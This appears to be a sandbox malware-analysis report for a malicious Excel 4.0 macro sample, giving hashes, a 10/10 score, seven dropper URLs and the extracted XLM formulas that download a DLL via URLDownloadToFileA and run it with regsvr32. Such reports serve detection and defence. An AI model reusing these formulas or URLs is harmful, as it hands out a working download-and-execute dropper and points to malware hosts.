General

  • Target

    a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

  • Size

    20KB

  • Sample

    241111-wsa57atbmc

  • MD5

    bb81f2a0f22a048d07799945931ab8ec

  • SHA1

    0c814100efe4675ce01ab4df4787d64ba46d1ce3

  • SHA256

    a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

  • SHA512

    1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0

  • SSDEEP

    384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://banrai.ac.th/website/IHI0iNLLWDh9P/

http://bangsoe.dk/__backup/JON6L/

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

https://barkstage.es/wp-content/S0Q/

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://banrai.ac.th/website/IHI0iNLLWDh9P/

xlm40.dropper

http://bangsoe.dk/__backup/JON6L/

xlm40.dropper

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

xlm40.dropper

https://barkstage.es/wp-content/S0Q/

xlm40.dropper

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

xlm40.dropper

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

xlm40.dropper

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Targets

    • Target

      a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

    • Size

      20KB

    • MD5

      bb81f2a0f22a048d07799945931ab8ec

    • SHA1

      0c814100efe4675ce01ab4df4787d64ba46d1ce3

    • SHA256

      a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

    • SHA512

      1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0

    • SSDEEP

      384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks